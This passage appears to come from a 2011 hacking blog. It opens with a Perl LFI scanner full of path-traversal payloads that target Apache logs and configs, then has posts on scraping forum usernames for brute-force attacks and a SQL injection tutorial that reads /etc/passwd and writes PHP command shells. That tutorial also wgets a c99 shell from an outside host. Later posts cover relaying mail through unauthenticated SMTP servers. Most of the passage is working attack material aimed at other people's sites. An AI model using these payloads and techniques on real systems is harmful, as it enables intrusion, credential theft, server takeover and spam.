'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
'/var/log/httpd/error_log',
'../var/log/httpd/error_log',
'../../var/log/httpd/error_log',
'../../../var/log/httpd/error_log',
'../../../../var/log/httpd/error_log',
'../../../../../var/log/httpd/error_log',
'../../../../../../var/log/httpd/error_log',
'../../../../../../../var/log/httpd/error_log',
'../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../var/log/httpd/error_log',
'/var/log/httpd/error_log%00',
'../var/log/httpd/error_log%00',
'../../var/log/httpd/error_log%00',
'../../../var/log/httpd/error_log%00',
'../../../../var/log/httpd/error_log%00',
'../../../../../var/log/httpd/error_log%00',
'../../../../../../var/log/httpd/error_log%00',
'../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../var/log/httpd/error_log%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'/etc/httpd/conf/httpd.conf',
'../etc/httpd/conf/httpd.conf',
'../../etc/httpd/conf/httpd.conf',
'../../../etc/httpd/conf/httpd.conf',
'../../../../etc/httpd/conf/httpd.conf',
'../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf%00',
'../etc/httpd/conf/httpd.conf%00',
'../../etc/httpd/conf/httpd.conf%00',
'../../../etc/httpd/conf/httpd.conf%00',
'../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'/etc/apache/conf/httpd.conf',
'../etc/apache/conf/httpd.conf',
'../../etc/apache/conf/httpd.conf',
'../../../etc/apache/conf/httpd.conf',
'../../../../etc/apache/conf/httpd.conf',
'../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../../etc/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf%00',
'../etc/apache/conf/httpd.conf%00',
'../../etc/apache/conf/httpd.conf%00',
'../../../etc/apache/conf/httpd.conf%00',
'../../../../etc/apache/conf/httpd.conf%00',
'../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'/usr/local/etc/apache/conf/httpd.conf',
'../usr/local/etc/apache/conf/httpd.conf',
'../../usr/local/etc/apache/conf/httpd.conf',
'../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf%00',
'../usr/local/etc/apache/conf/httpd.conf%00',
'../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'/etc/apache2/httpd.conf',
'../etc/apache2/httpd.conf',
'../../etc/apache2/httpd.conf',
'../../../etc/apache2/httpd.conf',
'../../../../etc/apache2/httpd.conf',
'../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../../etc/apache2/httpd.conf',
'/etc/apache2/httpd.conf%00',
'../etc/apache2/httpd.conf%00',
'../../etc/apache2/httpd.conf%00',
'../../../etc/apache2/httpd.conf%00',
'../../../../etc/apache2/httpd.conf%00',
'../../../../../etc/apache2/httpd.conf%00',
'../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../../etc/apache2/httpd.conf%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');
print ">start scaning[...]\n";

foreach $scan(@vuls){
$url = $link.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = LFI PRESENT!;}
else { $msg = "Not Found";}
print "$scaning..........[$msg]\n";
#EOF
}

CREATING TARGETED USERNAME LISTS WITH EPIC LEECH

2011-08-10T11:46:00.000-05:00

Today I am going to show you how to use EpicLeech.EXE to leech username lists from public forums. This tool can be very handy in putting together valid user list for targeted bruteforce attacks, which speeds things up considerably since you are using known usernames instead of bruteforcing both user and pass. It can be a little tricky at first but if you stick with it you can set up new site configurations in very little time. Here goes, try to keep up…

Pre-requisites:

· EpicLeech.EXE (with a handful of configurations already done for you) which you can download from here: http://www.megaupload.com/?d=TUAJDMZJ

· Target site with publicly available members page (i.e. no login required to view list)

o Use Google, try:” inurl:members.php”

Open EpicLeech.EXE p and it should look like this:

In order to create our own click the “Login Editor” button in the lower right, should open a new window that looks like this one:

This is what we will use to create our own custom template so that we can leech a large username list from our target site.

I should call out that this will only work if you can view the members list of the target website without needing to login. You first need to have a target site in mind that you eventually want to try and bruteforce/dictionary attack to find valid credentials. You can use Google to find them, if you need some quick examples to get you started just type “forum, members list” in Google or use your own creative dork and you will find an endless list of possibilities. Once you have found one you want to use, you will need to open it up in your favorite browser and then click on page 2 of the members list, so we can see how it is sorting the pages. You should find that the URL link will have either “page=” or “st=”. We will use this to set the “Sort Option” on the Epic Leech options, just make sure they match how the target site is sorting and you will be fine (it is pretty easy to match up). Here is a quick recap, now that we have some basic info gathered:

Example Link to Members Page: http://www.vbulletin.org/forum/memberlist.php

Example Link to Members Page 2: http://www.vbulletin.org/forum/memberlist.php?&order=asc&sort=username&page=2

The “Name” field is optional and is what will show up in the leech options for the profile. The host name is the site we will be targeting. The GET string is the trailing url or directory path to send the requests to. You will need to change the page number at the end to [MPP], so that the tool knows to replace this parameter based on the details provided for Users Per Page and # of Pages when doing the actual leeching. You can pull the info for Users Per Page and the # of Pages fields from the actual website, you might have to do some quick math or possible click the link to go to last page to see how many there actually are.

OK, so that is the basics…now we need to determine the correct parsing options which will tell the EpicLeech.EXE tool how to pull the data from the source code of the pages it is requesting. If you mess this up you will get more than just the user names and it will make it fairly useless to you so make sure you get this part right! You need to go back to your browser opened to the member page from earlier, and make the necessary clicks to view the source code of the page. You will want to take note of at least one username on the page, as we will use “CTRL+F” on the source code page to quickly find that same username in the source code. This will make things a bit easier in determining where we need to identify the proper UNIQUE tags to use.

This is the actual code for the username is below, note that the username is “-mk-” that I am focusing on to find the tags to use for parsing.

USERNAME CODE FROM EXAMPLE:

</tr><tr align="center">

<div class="smallfont"><a style="text-decoration:none; color:#000088;" href="member.php?u=34580" title="No Releases">Member</a></div>

</td>

You will need to determine if you need to use single parse technique or double parse. In this example, we will need to single parsing technique to work correctly. If the tags we were using appeared elsewhere in the code, we would need to use the double parsed technique to properly extract from this target due to the fact that the code appears in more than one place. The reason being, is that the HTML code and tags occur in more than place in the source code (not just around username), so we either need more unique tags (which are not available), or we do a double parse. Double parsing works by identifying a set of tags to mark in the first run, and then it looks inside of those tags and parses again using second set of tags. This way if the second sets of tags are not present then no extraction occurs. This will help us filter garbage out and focus on usernames since both conditions must be true. Trial and Error will help you to figure this out if you don’t pick it up right away, just keep playing with the tags you are using to see how it affects what is extracted as a “username”. If you cant get any success with single parsing, try double parse and secondary tags to help narrow down your results.

Using the example code above we would need to parse between ‘title="Find all posts by’ and ’border="0"’. Just so you know I tried using single and double parsing to pull the first occurance of the username in the code example above but was not able to properly get things to extract correctly, so I moved lower in code and realized it also has entry for linking to each usernames posted threads. This allowed me a second chance to try things out which are working at the moment I wrote this, here is the final configuration I came up with:

You have just created your first leeching profile. Hit the “Save Site” button and you can then see your new profile in the available options list to start leeching from. Go ahead and fire it up and start testing it, if there is too much being pulled in then you may need to review the tags being used for parsing and then adjust until you can find the right one that works for your particular target. Also be aware that sites tend to make updates all the time so a profile may work one day and be worthless the next, but now that you know how to make your own so it won’t be an issue anymore. I hope you have enjoyed this brief overview on creating username lists from forums with publicly available members lists, and feel free to use this template for the Vbulletin forums if you like. I will try to do a follow up series on how to use this list in other tools like Villain, Apex, or your cracker of choice to find tons of valid credentials to various other sites.

Proof it works (also see list included with download):

Rinse, wash, and repeat as needed. Until next time, Enjoy!

Laters,

H.R.

SQL Injection: How to use LOAD FILE & INTO DUMPFILE

2011-08-02T13:06:00.000-05:00

I have covered several techniques on my blog on how to perform SQL injections and today I want to add another cool trick to the arsenal we have at hand. In today’s article I am going to let you in on a little secret, which is how to use INTO_OUTFILE() & LOAD_FILE() during your SQLi adventures to go a little deeper when machines are misconfigured and left wide open. The techniques I will cover today will help you to gain access to files on target machine as well as show you how to upload your own files and code onto the target machine, all without ever stepping foot into the administration panel of the target website. Please try to keep up, here we go…

I will assume you have followed one of my previous tutorials from here on SQLi and found a target site that is indeed vulnerable, and now we will see if we can take things a step further this time by reading files from the target system and then testing whether or not we can upload our own files to said machine. In order to test the file access we have a few pre-requisites and then we have a few options:

PRE-REQUISITES:

· Vulnerable target site

· We need to know the current user name

o Check other SQLi tutorials on methods for checking current user()

· We need to know the current database

o Check other SQLi tutorials on methods for checking current database()

EXAMPLE-PREREQUISITES MET:

Once these details are known you can start working through the options to check the file privileges for the current user. There are many methods; here are a few for specifically checking file privileges:

· http://www.Site.com/index.php?id=0′ UNION SELECT file_priv FROM mysql.user WHERE user = ‘username’

· http://www.Site.com/index.php?id=1′ AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y’

· http://www.Site.com/index.php?id=0′ UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%

· http://www.Site.com/index.php?id=1′ AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y

If for some reason you can’t access the mysql users database we can still give things a shot but it will be slightly blind as we will need to assume we have file privileges and simply test things out with a little trial and error methodology. We also need to determine where we will have read/write access on the server so we need to determine the necessary paths on the target machine. This can be done as covered in previous articles by simple querying for the database() & @@datadir values.

NOTE: If you can’t get these values to return for one reason or another, you can try to trigger error events and skim as much related info as possible from the error messages, as quit often the data directory path and current database are listed in the actual error messages. You may also try to guess the web directory and go at this somewhat blind using the old trial and error method; here are some good places to try:

· /var/www/html/

· /var/www/web1/html/

· /var/www/sitename/htdocs/

· /var/www/localhost/htdocs

· /var/www/vhosts/sitename/httpdocs//etc/init.d/apache

· /etc/init.d/apache2

· /etc/httpd/httpd.conf

· /etc/apache/apache.conf

· /etc/apache/httpd.conf

· /etc/apache2/apache2.conf

· /etc/apache2/httpd.conf

· /usr/local/apache2/conf/httpd.conf

· /usr/local/apache/conf/httpd.conf

· /opt/apache/conf/httpd.conf

· /home/apache/httpd.conf

· /home/apache/conf/httpd.conf

· /etc/apache2/sites-available/default

· /etc/apache2/vhosts.d/default_vhost.include

· /templates_compiled/

· /templates_c/

· /templates/

· /temporary/

· /images/

· /cache/

· /temp/

· /files/

If you do a banner grab you can usually figure out some basic info regarding the webserver and OS which you can use to combine with Google to find other good places to look or try. Assuming we have gathered the necessary info up to now we will start to see what we can do…

SAMPLE BANNER GRAB USING CURL – “curl –I http://www.target-site.com/”:

USING LOAD_FILE():

We can use LOAD_FILE() to read the contents of any file contained within the webserver. We will typically check for the "/etc/password" file to see if we get lucky and scoop usernames and/or passwords to possible use in bruteforce attack later. It looks like this:

· http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file(‘path/to/file’),3,4,5--

o Simply replace ‘path/to/file’ with the path to the file you want to read, like this

· http://www.site.com/index.php?id=-725+UNION+SELECT+1,load_file('etc/passwd'),3,4,5--

SAMPLE IMAGE:

Also helpful to look for "/etc/hosts", "/etc/group", or possibly "C:\boot.ini" on Windows OS. You can use one to your liking, explore your own, just be aware that much like the table names this will need to be HEX'd from time to time to bypass filters and restrictions so results can be properly displayed.

SAMPLE IMAGE - /ETC/GROUP:

SAMPLE IMAGE - /ETC/HOSTS:

INTO OUTFILE & INTO DUMPFILE:

Now we will use INTO_OUTFILE() & INTO_DUMPFILE() for all that they offer and try to root the target server by uploading a shell via SQL injection, remember the whole point of this is to show you how to do it without having to even step foot in the admin panel. These two options allow you to either take the contents from a column & place them in a nice text file for cleanliness purposes, OR we can use it to upload a php script of our choice that we could then use to perform a remote file inclusion, cmd execution, or whatever else you can think of.

NOTE: You CAN NOT overwrite existing files on the target system with these methods and in general it requires Magice_quotes_gpc to be disabled. Also be aware that HEX() and CHAR() won’t work for this like it does in other circumstances (mainly table_name & LOAD_FILE()). The last warning is that you must ensure that INTO OUTFILE is the last statement of your request or query.

OK so first we can use INTO_DUMPFILE() to dump the contents of a column into a text file. If we do it correctly we can dump the results into a area on the webserver that we can then check afterwards to find the results. If for example we wanted to take the password column from the admin table and place the content into a file it would look like this:

· http://www.site.com/index.php?id=-725+UNION+SELECT+1,passwd,3,4,5+FROM+admin+INTO+DUMPFILE+’/path/on/target/file.txt’—

NOTE: You can use INTO_OUTFILE & INTO_DUMPFILE fairly interchangeable, but to avoid splitting chars between the data, we will use INTO DUMPFILE instead of INTO OUTFILE.

This will take the “passwd” column and will extract its full contents and place it in the new file created by our dumpfile argument, called “filed.txt”. Once you have run this query you can point your favorite browser at the designated web folder location to see the contents of your file you just created. If we wanted to take this even further you can use this same method but replace the column you are dumping with your own code. You can sue this approach to upload a .php backdoor, or perhaps upload some purposefully vulnerable code to allow remote file inclusion to get more privileged shell, or maybe you only need a simple php command shell to do your thing. All are possible and it works like this:

· http://www.site.com/index.php?id=-725+UNION+SELECT+null,’CODE’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—

NOTE: You need to null the column numbers when using this method to avoid writing numbers to our files. Whatever you place where CODE is, is what will be written to the evil.php file that is created. This may require that the PHP safe_mode be turned off. Depending on OS and PHP version you can bypass the safe_mode restrictions.

A few deadly examples:

· http://www.site.com/index.php?id=-725+UNION+SELECT+null,'<? system($_GET['c']); ?>’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—

· http://www.site.com/index.php?id=-725+UNION+SELECT+"<? system($_REQUEST['cmd']); ?>",2,3,4 INTO+OUTFILE+“/var/www/html/temp/evil.php" --

o these are simple PHP CMD shells which would allow you to issue some basic commands on the target server. To use, just open URL to new file and change the trailing part of URL to your desired command and watch the page refresh with your results displayed

§ http://www.site.com/temp/evil.php?c=<insert-command-here>

§ http://www.site.com/temp/evil.php?c=id

· check system id

§ http://www.site.com/temp/evil.php?c=cat /var/www/index.php

· check the code for index page to see if we can find the default credentials being used to make connections, as well as getting some info on directory structure perhaps

§ http://www.site.com/temp/evil.php?c=wget http://www.example.com/c99.php

· use wget to download remote shell for upgraded privileges and further rooting of the target server

· http://www.site.com/index.php?id=-725+UNION+SELECT+null, ‘<? phpinfo(); ?>’ ,null,null,null+INTO +DUMPFILE+’/path/on/target/evil.php’—

o This will give you a lot of information relating to the target server’s current configuration

Once last trick to show you is that you can actually combine both the LOAD_FILE() & INTO_DUMPFILE() to obtain useful information from the target server. This essentially puts a copy of a file into usable web page for you to easily grab and read. Here is an example of how it might be used:

· http://www.site.com/index.php?id=-725+UNION+SELECT+LOAD_FILE(‘/etc/passwd’),null+INTO+DUMPFILE+’/path/on/target/dump.php’—

· http://www.site.com/index.php?id=-725+UNION+SELECT+HEX(LOAD_FILE(‘/etc/passwd’)),null+INTO+DUMPFILE+’/path/on/target/dump.php’—

o might require you to decrypt it but if it helps you to bypass filters and restrictions then so be it. You can try PHP charset encoders to get this done.

That brings this to a close on how to use LOAD_FILE and INTO_DUMPFILE to turn a standard SQL Injection into full target system takeover. I hope you have enjoyed this, and until next time Enjoy!

H.R.

CHECKING YOUR EXTERNAL IP FROM COMMAND LINE

2011-07-28T16:18:00.000-05:00

I find myself often working from the command line in the terminal or console when conducting various security tests and wondering if my proxy or VPN is truly working correctly for my command line tools. It is easy enough to check from a standard browser but this requires me to leave the console and actually open a browser, which of courses I am too lazy to do. In my search to keep all things command line I found this gem of a script written in python that does exactly what I have been looking for - and I had to share it with you! It is called “whatsmyip.py”. I did not write this but it is a great piece of python code and works simple enough. If you place this script in your PATH variable you should be able to access it from anywhere when in the command line, allowing us to quickly check our external ip and confirm our HTTP proxy or VPN is properly working for our CLI tools. No more need to even leave the console! You can always use ipconfig/ifconfig to check your internal IP from the command line, now you can also check your external IP. It is as simple as saving the code provided below as “<insert-name>.py” on your system and then running as “name.py” OR “python name.py”. It will grab your external IP and return the result to the console screen. It is super easy and really helpful. It won’t do anything else, but it does what it is supposed to and makes another fine addition to any real pen-testers bag of tricks to use at their disposal. Hope you find this helpful in some way, and as always Enjoy!

PS - All credits for coding this script go to: s3my0n

Quick Screenshot:

CODE:http://paste2.org/p/1548304
DOWNLOAD: http://www.megaupload.com/?d=ENQMX9GY

SQL INJECTION TUTORIALS

2011-07-15T20:27:00.003-05:00

Hey Guys - I have been getting requests for more details on how to perform manual SQL Injections. I have gathered what I beleive to be the best of what is out there and compiled it in my own form. I have and am working on compiling it all into a educational type format so others can benifit from it while at the same time giving myself my own online reference guide available at any time (and to anyone else interested). I will be giving these tutorials there own pages as I find the material to be a good reference. I just posted the first few outlining some basic techniques and plan to add several more pages as the summer continues and time permits. In order to give you an idea of what is going to be covered I have already posted basic injections, WAF Bypassing, Blind & Time-Based Injections and still plan on covering , Double-Queries or Stacked Queries, Xpath Injections, as well as providing some general reference guides for handling Postgres & Oracle database injections. Please check the top of the page to see the new pages that are currently available and check back often to see what else has been added. I hope you find them all useful and appreciate the time that is going into packaging it all up for you. As always, Enjoy!

Here is what's available so far:
Basic SQL Injection 101
SQLi & WAF Bypassing
BLIND & Time-Based SQL Injections
SQLi using LOAD FILE & INTO OUTFILE

HOW TO: Send Messages via UnAuthenticated SMTP Server

2011-07-11T10:43:00.000-05:00

Email Server Hunting with NSLookup:
OK so I have showed you how to perform password profiling, and how to get cracking locally and over the network, but some of you keep asking how you find the mail servers to attack. If the FQDN or IP address is unknown, the easiest way to find this information is to use the Nslookup command-line tool to find the MX record for the destination domain. You can try various web scanners to find it or you can simply open a command prompt and type the following:

nslookup
set type=MX
<enter site name>
nslookup type=MX <target IP or site name>

NOTE: if it seems to timeout or false results you can adjust timing by using "set timeout 20" between step 2 and step 3 above, since the default is set to only 15 seconds.

This will begin to send DNS queries for the MX or mail exchange records. You will find this will give you an output that tells you which mail servers are registered by your target site. Note the first line after "Non-authoritative answer". The "MX preference" specifies which mail server to use and in which order. The lower the number, the more preferred the mail server is. If the preferences for each mail server are the same, you can use any them.

OK, so you found the email server...what now? We can fire up Hydra and start trying to bruteforce the passwords for any known emails (follow previous tutorials for this part), but before we do lets see how secure it really is. Keep the console open for another minute and let us see if we can use Telnet to log into the SMTP server, if we can get in we will then see if we can send a message without any authenticated credentials. Here is how we use Telnet on Port 25 to test SMTP communication from command line:

Telnet
localecho

This will let us view all of the characters typed as we type them in the console (localecho not always required but I find it helpful on older systems-XP)

open <smtp server ip/name found above> 25

This will open telnet session between our machine and remote ip/server on port 25 (port 25 is default port for SMTP; you may need to change to fit your situation)

EHLO <ip/servername.com>

EHLO is the Extended Simple Message Transfer Protocol (ESMTP) verb and can help to establish the remote SMTP capabilities during the initial connection

MAIL FROM:sendername@email.com

This defines who email will be sent from (helps to use valid email to avoid errors on some setups or in case the receiver is undeliverable)

RCPT TO:receivername@email.com NOTIFY=success,failure

The NOTIFY is optional but can be helpful as it will cause the server to provide a message to let us know whether it worked or not. A message number of 500 means there was a failure or error, while 220 means it was a success

You will receive a 354 response that resembles the following:

"Copy Code 354 Start mail input; end with <CLRF>.<CLRF>"

Subject: <Subject Title/Name>

This defines the subject line of email message, now hit ENTER to add a blank line. We need to have a blank line between the Subject header line and the Body of email to avoid errors

Type your message now...press ENTER when done

This defines the body of the email message to be sent

Just press ENTER again
. (Type a Period)

This should end the message and let it know we are ready to send. You should see a message similar to this:

"Copy Code 250 2.6.0 <GUID> Queued mail for delivery"

That is it, you just sent a SMTP email message without any authentication required! You can repeat as necessary or you can type QUIT to disconnect from the SMTP server, which should give you a message like this:

"Copy Code 221 2.0.0 Service closing transmission channel."

You can then type QUIT once more to close Telnet session.

Note:You can't use the backspace key after you have connected to the destination SMTP server within the Telnet session. If you make a mistake as you type an SMTP command, you must press ENTER and then type the command again from scratch once more.

PACK - Password Analysis and Cracking Kit

2011-06-19T01:40:00.000-05:00

